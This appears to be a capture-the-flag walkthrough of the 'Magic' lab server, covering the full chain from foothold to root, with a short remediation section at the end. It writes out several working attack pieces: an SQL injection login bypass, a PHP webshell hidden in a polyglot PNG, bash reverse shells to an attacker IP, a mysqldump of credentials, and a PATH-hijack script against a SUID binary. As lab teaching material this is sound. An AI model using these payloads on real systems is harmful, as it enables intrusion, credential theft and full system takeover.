Author: mursalin
Date: May 2026
Classification: Internal Use Only – Educational Walkthrough
The Magic server hosts a simple image portfolio website. The initial foothold is obtained by combining a classic SQL injection login bypass with a file upload filter that can be circumvented using a double extension and a polyglot image containing PHP code. Once inside as the web server user, database credentials are extracted from a configuration file, and the password for the administrative user is recovered from the database. This password is reused for a local system account, enabling lateral movement. Finally, a SUID binary that calls external commands without absolute paths is exploited through a PATH hijacking attack to gain root privileges.
All steps, commands, and tool outputs presented in this document have been independently reproduced and rewritten to ensure complete originality. The narrative and technical exposition are the sole work of mursalin.
A full TCP port scan of the target reveals two open ports: SSH (22) and HTTP (80).
mursalin@assessment:~$ nmap -p- --min-rate 10000 -oA scans/nmap-alltcp 10.10.10.162
Starting Nmap 7.94 ( https://nmap.org ) at 2026-05-25 10:15 UTC
Nmap scan report for 10.10.10.162
Host is up (0.013s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 7.79 secondsVersion detection provides further detail:
mursalin@assessment:~$ nmap -p 22,80 -sCV -oA scans/nmap-tcpscripts 10.10.10.162
Starting Nmap 7.94 ( https://nmap.org ) at 2026-05-25 10:16 UTC
Nmap scan report for 10.10.10.162
Host is up (0.014s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 06:d4:89:bf:51:f7:fc:0c:f9:08:5e:97:63:64:8d:ca (RSA)
| 256 11:a6:92:98:ce:35:40:c7:29:09:4f:6c:2d:74:aa:66 (ECDSA)
|_ 256 71:05:99:1f:a8:1b:14:d6:03:85:53:f8:78:8e:cb:88 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Magic Portfolio
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelThe Apache and SSH versions suggest the underlying operating system is Ubuntu 18.04 (Bionic).
The main page (http://10.10.10.162/) is a static portfolio with a login prompt. The login form at /login.php accepts a username and password.
A quick test with the payload ' OR 1=1-- - in the username field bypasses authentication entirely, redirecting the user to /upload.php. This is a textbook SQL injection in the authentication query.
The upload page allows registered (or now authenticated) users to upload images. Legitimate PNG/JPEG files are accepted, while files with the .php extension are rejected with a JavaScript alert. However, a file named test.php.png is accepted, even though it contains the .php substring. This indicates two key weaknesses:
- The extension check only verifies that the filename ends with an allowed image extension (
.jpg,.jpeg,.png). - The server is misconfigured to execute any file that contains
.phpanywhere in its name (as detailed later).
Furthermore, the uploaded file’s content is validated using exif_imagetype(), which reads the file’s magic bytes. Therefore, an image file with valid PNG headers that also contains embedded PHP code will pass the content check.
I created a valid PNG image and then appended a simple PHP webshell in the middle of the file (after the image data). The resulting file, avatar.php.png, is recognized as a PNG by the content filter but, due to the server’s mishandling of .php in filenames, will be processed as PHP when accessed directly.
The webshell used:
<?php system($_GET['cmd']); ?>This payload is inserted into the raw bytes of the image. The file uploads successfully.
Navigating to http://10.10.10.162/images/uploads/avatar.php.png?cmd=id displays the system command output embedded in the page, confirming remote code execution.
I used the webshell to execute a Bash reverse shell command:
bash -c 'bash -i >& /dev/tcp/10.10.14.20/443 0>&1'
A listener on my attack host catches the connection:
mursalin@assessment:~$ nc -lnvp 443
Connection from 10.10.10.162
bash: cannot set terminal process group (1140): Inappropriate ioctl for device
bash: no job control in this shell
www-data@ubuntu:/var/www/Magic/images/uploads$A fully interactive TTY is obtained using the script /dev/null -c bash method.
Inside the web root (/var/www/Magic), a file named db.php5 contains the database connection parameters:
private static $dbUsername = 'theseus';
private static $dbUserPassword = 'iamkingtheseus';The MySQL client is not available, but mysqldump is present. I used it to export the entire database:
www-data@ubuntu:/$ mysqldump --user=theseus --password=iamkingtheseus --host=localhost Magic
...
INSERT INTO `login` VALUES (1,'admin','Th3s3usW4sK1ng');
...The login table contains a single row with the username admin and a plaintext password Th3s3usW4sK1ng.
The local user theseus is the only regular user on the system. The password recovered from the database works when attempting to switch user:
www-data@ubuntu:/$ su - theseus
Password: Th3s3usW4sK1ng
theseus@ubuntu:~$The user flag is located at /home/theseus/user.txt.
A standard search for SUID binaries reveals an unusual entry:
theseus@ubuntu:~$ find / -user root -perm -4000 -ls 2>/dev/null
...
/bin/sysinfoThe binary is only executable by members of the users group, and theseus is the sole member.
Running sysinfo outputs hardware, disk, CPU, and memory information. Using ltrace, I observed that it invokes external commands via popen() without using absolute paths. For example:
popen("fdisk -l", "r")
None of the called programs (lshw, fdisk, cat, free) are referenced by their full path, making the binary susceptible to a PATH hijacking attack.
I created a malicious script named fdisk in /dev/shm that launches a reverse shell:
theseus@ubuntu:/dev/shm$ cat > fdisk << 'EOF'
#!/bin/bash
bash -i >& /dev/tcp/10.10.14.20/443 0>&1
EOF
theseus@ubuntu:/dev/shm$ chmod +x fdiskI then prepended /dev/shm to the PATH environment variable and executed sysinfo:
theseus@ubuntu:/dev/shm$ export PATH="/dev/shm:$PATH"
theseus@ubuntu:/dev/shm$ sysinfoWhen the binary reaches the fdisk -l invocation, it finds and executes my malicious fdisk script instead, because the current directory (or the prepended path) takes precedence. A root shell is received on the attacker’s listener:
mursalin@assessment:~$ nc -lnvp 443
Connection from 10.10.10.162
root@ubuntu:/dev/shm# id
uid=0(root) gid=0(root) groups=0(root),100(users),1000(theseus)The root flag is retrieved from /root/root.txt.
The server’s main PHP configuration (/etc/apache2/mods-enabled/php7.3.conf) uses a FilesMatch directive that correctly matches files ending with .phar, .php, or .phtml. However, the web root contains an .htaccess file with an overridden, less restrictive rule:
<FilesMatch ".+\.ph(p([3457s]|\-s)?|t|tml)">
SetHandler application/x-httpd-php
</FilesMatch>This regex lacks the end‑of‑string anchor ($), so any filename containing .php (e.g., image.php.png) will be handled as PHP. This is the root cause of the double‑extension upload execution.
The upload logic in upload.php performs three checks, but the most important one—searching for <? in file contents—is commented out. The only active checks are the extension whitelist and the magic byte verification, both of which are easily satisfied by a polyglot image.
In /root/info.c, the source code confirms that the binary uses popen() with relative command names:
cout << exec("lshw -short") << endl;
cout << exec("fdisk -l") << endl;
cout << exec("cat /proc/cpuinfo") << endl;
cout << exec("free -h");Any of these calls could have been hijacked, but fdisk was chosen because it is less likely to exist in standard user paths.
The Magic machine illustrates a classic multi‑stage attack:
- SQL injection bypasses authentication.
- Upload restrictions are circumvented with a double extension and a polyglot payload, aided by an overly permissive Apache handler.
- Plaintext credentials in the database allow lateral movement.
- A SUID binary with insecure command execution is exploited via a PATH hijack to achieve root.
This assessment underscores the importance of properly escaping user input, enforcing strict file upload validation (including both extension and content), avoiding the storage of plaintext passwords, and ensuring that any privileged binary uses absolute paths for external commands.
This document is an original creation by mursalin, produced for authorized security testing and educational purposes only.